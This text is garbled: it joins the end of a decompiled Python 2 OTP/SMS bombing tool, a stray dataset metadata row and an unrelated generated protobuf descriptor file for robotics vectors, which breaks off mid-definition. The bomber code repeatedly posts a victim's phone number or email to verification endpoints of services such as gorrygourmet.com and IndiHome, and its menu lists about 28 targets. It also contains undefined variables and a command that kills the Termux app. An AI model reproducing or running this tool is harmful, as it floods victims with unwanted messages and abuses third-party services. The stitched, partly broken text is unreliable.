print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
exit()
y = raw_input('\n\x1b[1;37m[\x1b[1;31m!\x1b[1;37m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
cml()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def gry():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
gry()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
gry()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
r = requests.Session()
hd = {'Connection': 'keep-alive', 'Content-Length': '23', 'Cache-Control': 'max-age=0', 'Origin': 'https://gorrygourmet.com', 'Upgrade-Insecure-Requests': '1', 'Content-Type': 'application/x-www-form-urlencoded', 'Save-Data': 'on', 'user-agent': '{acak}', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'Referer': 'https://gorrygourmet.com/registration/verification-otp', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://gorrygourmet.com/register/set-otp', headers=hd, data={'phoneNumber': no})
if 'dikirimkan' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
exit()
y = raw_input('\n\x1b[1;37m[\x1b[1;31m!\x1b[1;37m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
gry()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def email():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: emailkorban@gmail.com\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
email()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
email()
print
r = requests.Session()
z = 0
head = {'Connection': 'keep-alive', 'Content-Length': '39', 'Accept': '*/*', 'Origin': 'https://sobat.indihome.co.id', 'X-Requested-With': 'XMLHttpRequest', 'User-Agent': '{acak}', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'Referer': 'https://sobat.indihome.co.id/register', 'Accept-Language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
for x in range(int(jml)):
try:
z += 1
a = r.post('https://sobat.indihome.co.id/ajaxreg/emailGetOtp', headers=head, data={'type': 'email', 'email': mel})
if 'Kode verifikasi telah dikirim ke email Anda' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, mel)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, mel)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
email()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def logo():
os.system('clear')
ketik('\n%s _____ %s__ %s_______\n| \\%s .---.-.----.| |--.%s| __|%s.-----.---.-.--------.\n%s| -- %s|%s| _ | _|| < %s|__ |%s| _ | _ | |\n%s|_____/ %s|___._|__| |__|__|%s|_______|%s| __|___._|__|__|__|\n %s|__| v0.8\n' % (G1, W1, G1, W1, G1, W1, G1, G1, W1, G1, W1, G1, W1, G1, W1, W1))
def menu():
print '%s{%s01%s} %sSpam AYO SRC\t\t%s{%s16%s} %sSpam JET\n%s{%s02%s} %sSpam Airbnb\t\t%s{%s17%s} %sSpam Depop\n%s{%s03%s} %sSpam OLX\t\t\t%s{%s18%s} %sSpam Cmlink\n%s{%s04%s} %sSpam Mister Aladin\t\t%s{%s19%s} %sSpam Sooplai\n%s{%s05%s} %sSpam Three\t\t\t%s{%s20%s} %sSpam Tiket\n%s{%s06%s} %sSpam OYO\t\t\t%s{%s21%s} %sSpam Pomona\n%s{%s07%s} %sSpam Codapay\t\t%s{%s22%s} %sSpam Payfazz\n%s{%s08%s} %sSpam MAPCLUB\t\t%s{%s23%s} %sSpam Rework\n%s{%s09%s} %sSpam Gojek\t\t\t%s{%s24%s} %sSpam Gorry\n%s{%s10%s} %sSpam Rupa Rupa\t\t%s{%s25%s} %sSpam Qikcircle\n%s{%s11%s} %sSpam Indihome\t\t%s{%s26%s} %sSpam Kkoin\n%s{%s12%s} %sSpam PHD\t\t\t%s{%s27%s} %sSpam Ace\n%s{%s13%s} %sSpam Kelas pintar\t\t%s{%s28%s} %sSpam Bakmi Gm\n%s{%s14%s} %sSpam Redbus\n%s{%s15%s} %sSpam Shopback\n%s{%s99%s} %sBack\t\t\t%s{%s00%s} %sExit' % (W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, R1, W1, R0, W1, R1, W1, R0)
def ct():
koneksi()
os.system('git pull')
time.sleep(3)
logo()
print '%s[%s1%s] %sHajar\n%s[%s2%s] %sUpdate\n%s[%s3%s] %sGet token\n%s[%s4%s] %sReport bug (Whatsapp)\n%s[%s5%s] %sAbout\n%s[%s0%s] %sExit' % (W1, C1, W1, W0, W1, C1, W1, W0, W1, C1, W1, W0, W1, C1, W1, W0, W1, C1, W1, W0, W1, R1, W1, R0)
su = ['1', '2', '3', '4', '5', '0']
wa = raw_input('\n%s\xe2\x95\x94%s[%sD4RK5H4D0W5%s]\n%s\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90%s[%sChoice%s]> %s' % (C1, W1, P1, W1, C1, W1, P1, W1, W0))
while wa not in su:
logo()
print '%s[%s1%s] %sHajar\n%s[%s2%s] %sUpdate\n%s[%s3%s] %sGet token\n%s[%s4%s] %sReport bug (Whatsapp)\n%s[%s5%s] %sAbout\n%s[%s0%s] %sExit' % (W1, C1, W1, W0, W1, C1, W1, W0, W1, C1, W1, W0, W1, C1, W1, W0, W1, C1, W1, W0, W1, R1, W1, R0)
print '\n%s[%sx%s] %sPilihan Anda salah' % (W0, R0, W0, R0)
wa = raw_input('%s\xe2\x95\x94%s[%sD4RK5H4D0W5%s]\n%s\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90%s[%sChoice%s]> %s' % (C1, W1, P1, W1, C1, W1, P1, W1, W0))
if wa == '1':
while True:
logo()
print '%s[%s#%s] %sWelcome' % (G1, Y1, G1, W0)
print '%s[%s#%s] %sKalo gak tau tokennya nya pilih menu Get token' % (G1, Y1, G1, W0)
try:
e = getpass('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mEnter Token : ')
if e == 'dark4434524b53483444305753spam':
print '\x1b[1;32m[\x1b[1;33m\xe2\x88\x9a\x1b[1;32m] \x1b[0;37mLogin success'
time.sleep(1)
break
main1()
else:
print '\x1b[1;37m[\x1b[1;31m!\x1b[1;37m] \x1b[0;37mWrong Password'
time.sleep(1)
except Exception:
print '\x1b[1;37m[\x1b[1;31m!\x1b[1;37m] \x1b[0;37mWrong Password'
time.sleep(1)
except KeyboardInterrupt:
os.system('killall -9 com.termux')
print '\x1b[1;37m[\x1b[1;31m!\x1b[1;37m] \x1b[0;37mWrong Password'
time.sleep(1)
os.system('clear')
elif wa == '2':
koneksi()
os.system('git pull')
print '%s[%s+%s] %sTools was updated. \xc2\xaf\\_(\xe3\x83\x84)_/\xc2\xaf' % (W1, P1, W1, W0)
exit()
elif wa == '3':
koneksi()
print '%s[%s*%s] %sMakasih bro dah use tool gw :)' % (W1, G1, W1, W0)
time.sleep(4)
print '%s[%s*%s] %sTunggu, Anda akan di alihkan ke browser' % (W1, G1, W1, W0)
time.sleep(3)
os.system('xdg-open https://shtlink.pw/oP9hg')
ct()
elif wa == '4':
koneksi()
logo()
time.sleep(1)
chat = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mEnter your message : ')
chat.replace(' ', '%20')
spin()
try:
sp.check_output(['am', 'start', 'https://api.whatsapp.com/send?phone=628996604524&text=Report : ' + chat + ''])
except:
metu()
ct()
elif wa == '5':
print '%s[%s#%s] %sAuthor : D4RK5H4D0W5\n%s[%s#%s] %sThx to : \n%s[%s#%s] %sAllah\n%s[%s#%s] %sOfficial Offensive Security Ghost\n%s[%s#%s] %sAnd you' % (G1, Y1, G1, W0, G1, Y1, G1, W0, G1, Y1, G1, W0, G1, Y1, G1, W0, G1, Y1, G1, W0)
elif wa == '0':
print
metu()
def main1():
try:
logo()
print '%s[%s1%s] %sSpam Call\n%s[%s2%s] %sSpam WA\n%s[%s3%s] %sSpam Sms\n%s[%s4%s] %sBack\n%s[%s0%s] %sExit\n' % (W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, R0)
coi = raw_input('%s\xe2\x95\x94%s[%sD4RK5H4D0W5%s]\n%s\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90%s[%sChoice%s]> %s' % (C1, W1, P1, W1, C1, W1, P1, W1, W0))
mer = ['1', '2', '3', '4', '0']
while coi not in mer:
logo()
print '%s[%s1%s] %sSpam Call\n%s[%s2%s] %sSpam WA\n%s[%s3%s] %sSpam Sms\n%s[%s4%s] %sBack\n%s[%s0%s] %sExit\n' % (W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, R0)
print '%s[%sx%s] %sPilihan Anda salah' % (W0, R1, W0, R0)
coi = raw_input('%s\xe2\x95\x94%s[%sD4RK5H4D0W5%s]\n%s\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90%s[%sChoice%s]> %s' % (C1, W1, P1, W1, C1, W1, P1, W1, W0))
if coi == '1' or coi == '01':
call()
elif coi == '2' or coi == '02':
bos()
elif coi == '3' or coi == '03':
main2()
elif coi == '4' or coi == '04':
ct()
elif coi == '0':
print
metu()
except KeyboardInterrupt:
print
metu()
def main2():
try:
logo()
menu()
no = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '01', '02', '03', '04', '05', '06', '07', '08', '09', '0', '00', '99']
pilih = raw_input('\n%s\xe2\x95\x94%s[%sD4RK5H4D0W5%s]\n%s\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90%s[%sChoice%s]> %s' % (C1, W1, P1, W1, C1, W1, P1, W1, W0))
while pilih not in no:
logo()
menu()
print '\n%s[%sx%s] %sPilihan Anda salah' % (W0, R1, W0, R0)
pilih = raw_input('%s\xe2\x95\x94%s[%sD4RK5H4D0W5%s]\n%s\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90%s[%sChoice%s]> %s' % (C1, W1, P1, W1, C1, W1, P1, W1, W0))
if pilih == '1' or pilih == '01':
src()
elif pilih == '2' or pilih == '02':
air()
elif pilih == '3' or pilih == '03':
olx()
elif pilih == '4' or pilih == '04':
ald()
elif pilih == '5' or pilih == '05':
tri()
elif pilih == '6' or pilih == '06':
oyo()
elif pilih == '7' or pilih == '07':
coda()
elif pilih == '8' or pilih == '08':
map()
elif pilih == '9' or pilih == '09':
gojek()
elif pilih == '10':
rupa()
elif pilih == '11':
idh()
elif pilih == '12':
phd2()
elif pilih == '13':
kpt()
elif pilih == '14':
red()
elif pilih == '15':
shp()
elif pilih == '16':
jet()
elif pilih == '17':
dp()
elif pilih == '18':
cml()
elif pilih == '29':
sop()
elif pilih == '20':
tkt()
elif pilih == '21':
pmn()
elif pilih == '22':
pfz()
elif pilih == '23':
rwk()
elif pilih == '24':
gry()
elif pilih == '25':
qcr()
elif pilih == '26':
kk()
elif pilih == '27':
ace()
elif pilih == '28':
bkm()
elif pilih == '99':
main1()
elif pilih == '0' or pilih == '00':
print
metu()
except KeyboardInterrupt:
print
metu()
if __name__ == '__main__':
ct()
main1()
main2()
# Decompiled At : Wed Apr 1 13:27:38 2020
| 45.528247 | 1,308 | 0.534757 | 11,937 | 78,172 | 3.476921 | 0.068275 | 0.043562 | 0.048068 | 0.068427 | 0.758987 | 0.735182 | 0.725352 | 0.714774 | 0.706438 | 0.699788 | 0 | 0.09066 | 0.247646 | 78,172 | 1,716 | 1,309 | 45.554779 | 0.615034 | 0.000768 | 0 | 0.813688 | 0 | 0.108365 | 0.446996 | 0.137464 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.005703 | 0.001901 | null | null | 0.162864 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ccaad55b48f1b450e49fc8ea4c6bf42a5ca516dc | 23,299 | py | Python | examples/pybullet/gym/pybullet_envs/minitaur/robots/vector_pb2.py | felipeek/bullet3 | 6a59241074720e9df119f2f86bc01765917feb1e | [
"Zlib"
] | 9,136 | 2015-01-02T00:41:45.000Z | 2022-03-31T15:30:02.000Z | examples/pybullet/gym/pybullet_envs/minitaur/robots/vector_pb2.py | felipeek/bullet3 | 6a59241074720e9df119f2f86bc01765917feb1e | [
"Zlib"
] | 2,424 | 2015-01-05T08:55:58.000Z | 2022-03-30T19:34:55.000Z | examples/pybullet/gym/pybullet_envs/minitaur/robots/vector_pb2.py | felipeek/bullet3 | 6a59241074720e9df119f2f86bc01765917feb1e | [
"Zlib"
] | 2,921 | 2015-01-02T10:19:30.000Z | 2022-03-31T02:48:42.000Z | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: vector.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='vector.proto',
package='robotics.messages',
syntax='proto3',
serialized_options=b'\370\001\001',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x0cvector.proto\x12\x11robotics.messages\"6\n\x08Vector4d\x12\t\n\x01x\x18\x01 \x01(\x01\x12\t\n\x01y\x18\x02 \x01(\x01\x12\t\n\x01z\x18\x03 \x01(\x01\x12\t\n\x01w\x18\x04 \x01(\x01\"6\n\x08Vector4f\x12\t\n\x01x\x18\x01 \x01(\x02\x12\t\n\x01y\x18\x02 \x01(\x02\x12\t\n\x01z\x18\x03 \x01(\x02\x12\t\n\x01w\x18\x04 \x01(\x02\"6\n\x08Vector4i\x12\t\n\x01x\x18\x01 \x01(\x03\x12\t\n\x01y\x18\x02 \x01(\x03\x12\t\n\x01z\x18\x03 \x01(\x03\x12\t\n\x01w\x18\x04 \x01(\x03\"+\n\x08Vector3d\x12\t\n\x01x\x18\x01 \x01(\x01\x12\t\n\x01y\x18\x02 \x01(\x01\x12\t\n\x01z\x18\x03 \x01(\x01\"+\n\x08Vector3f\x12\t\n\x01x\x18\x01 \x01(\x02\x12\t\n\x01y\x18\x02 \x01(\x02\x12\t\n\x01z\x18\x03 \x01(\x02\"+\n\x08Vector3i\x12\t\n\x01x\x18\x01 \x01(\x03\x12\t\n\x01y\x18\x02 \x01(\x03\x12\t\n\x01z\x18\x03 \x01(\x03\" \n\x08Vector2d\x12\t\n\x01x\x18\x01 \x01(\x01\x12\t\n\x01y\x18\x02 \x01(\x01\" \n\x08Vector2f\x12\t\n\x01x\x18\x01 \x01(\x02\x12\t\n\x01y\x18\x02 \x01(\x02\" \n\x08Vector2i\x12\t\n\x01x\x18\x01 \x01(\x03\x12\t\n\x01y\x18\x02 \x01(\x03\"\x1b\n\x07Vectord\x12\x10\n\x04\x64\x61ta\x18\x01 \x03(\x01\x42\x02\x10\x01\"\x1b\n\x07Vectorf\x12\x10\n\x04\x64\x61ta\x18\x01 \x03(\x02\x42\x02\x10\x01\"\x1b\n\x07Vectori\x12\x10\n\x04\x64\x61ta\x18\x01 \x03(\x03\x42\x02\x10\x01\x42\x03\xf8\x01\x01\x62\x06proto3'
)
_VECTOR4D = _descriptor.Descriptor(
name='Vector4d',
full_name='robotics.messages.Vector4d',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='x', full_name='robotics.messages.Vector4d.x', index=0,
number=1, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='y', full_name='robotics.messages.Vector4d.y', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='z', full_name='robotics.messages.Vector4d.z', index=2,
number=3, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='w', full_name='robotics.messages.Vector4d.w', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=35,
serialized_end=89,
)
_VECTOR4F = _descriptor.Descriptor(
name='Vector4f',
full_name='robotics.messages.Vector4f',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='x', full_name='robotics.messages.Vector4f.x', index=0,
number=1, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='y', full_name='robotics.messages.Vector4f.y', index=1,
number=2, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='z', full_name='robotics.messages.Vector4f.z', index=2,
number=3, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='w', full_name='robotics.messages.Vector4f.w', index=3,
number=4, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=91,
serialized_end=145,
)
_VECTOR4I = _descriptor.Descriptor(
name='Vector4i',
full_name='robotics.messages.Vector4i',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='x', full_name='robotics.messages.Vector4i.x', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='y', full_name='robotics.messages.Vector4i.y', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='z', full_name='robotics.messages.Vector4i.z', index=2,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='w', full_name='robotics.messages.Vector4i.w', index=3,
number=4, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=147,
serialized_end=201,
)
_VECTOR3D = _descriptor.Descriptor(
name='Vector3d',
full_name='robotics.messages.Vector3d',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='x', full_name='robotics.messages.Vector3d.x', index=0,
number=1, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='y', full_name='robotics.messages.Vector3d.y', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='z', full_name='robotics.messages.Vector3d.z', index=2,
number=3, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=203,
serialized_end=246,
)
_VECTOR3F = _descriptor.Descriptor(
name='Vector3f',
full_name='robotics.messages.Vector3f',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='x', full_name='robotics.messages.Vector3f.x', index=0,
number=1, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='y', full_name='robotics.messages.Vector3f.y', index=1,
number=2, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='z', full_name='robotics.messages.Vector3f.z', index=2,
number=3, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=248,
serialized_end=291,
)
_VECTOR3I = _descriptor.Descriptor(
name='Vector3i',
full_name='robotics.messages.Vector3i',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='x', full_name='robotics.messages.Vector3i.x', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='y', full_name='robotics.messages.Vector3i.y', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='z', full_name='robotics.messages.Vector3i.z', index=2,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=293,
serialized_end=336,
)
_VECTOR2D = _descriptor.Descriptor(
name='Vector2d',
full_name='robotics.messages.Vector2d',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='x', full_name='robotics.messages.Vector2d.x', index=0,
number=1, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='y', full_name='robotics.messages.Vector2d.y', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=338,
serialized_end=370,
)
_VECTOR2F = _descriptor.Descriptor(
name='Vector2f',
full_name='robotics.messages.Vector2f',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='x', full_name='robotics.messages.Vector2f.x', index=0,
number=1, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='y', full_name='robotics.messages.Vector2f.y', index=1,
number=2, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=372,
serialized_end=404,
)
_VECTOR2I = _descriptor.Descriptor(
name='Vector2i',
full_name='robotics.messages.Vector2i',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='x', full_name='robotics.messages.Vector2i.x', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='y', full_name='robotics.messages.Vector2i.y', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
